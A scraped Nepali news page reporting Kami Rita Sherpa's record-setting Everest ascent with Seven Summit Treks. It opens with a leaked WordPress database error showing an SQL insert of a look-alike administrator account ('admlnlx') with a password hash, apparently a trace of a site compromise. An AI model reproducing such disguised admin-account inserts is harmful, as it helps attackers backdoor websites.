WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi1C6Ed.JzSqUCzziX6RKye4d4Qx8t/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 20:00:09', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १ जेष्ठ, सोलुखुम्बु । खुम्बु पासाङल्यामु गाउपालिका ५ थामे गाउँका ४९ वर्षिय कामिरिता शेर्पाले आफ्नै नाममा रहेको सर्वाधिक पटक विश्वको सर्वोच्च शिखर आरोहण गर्ने कीर्तिमान सुधार गरेका हुन् ।
“कामिरिता शेर्पा र निमा ओङ्दी शेर्पा बुधवार बिहान ७:५० बजे सगरमाथाको शिखरमा पुगेको आधार शिविरबाट पर्यटन विभागकी निर्देशक मीरा आचार्यले बताइन् ।
शेर्पाले सेभेन समिट ट्रेक्सबाट आरोहण गरेका हुन् । उनले यसअघि पनि २२ पटक आरोहण गरी विश्व कीर्तिमान कायम गरिसकेका थिए । कामीरितासँगै वाङ्दी शेर्पा र केही विदेशीले समेत सगरमाथाको सफल आरोहण गरेका छन् । कामीरिता यसपटक विदेशी आरोहीका लागि हाई अल्टीच्युट गाइड तथा लिडरको जिम्मेवारी लिई सगरमाथा चढेका थिए ।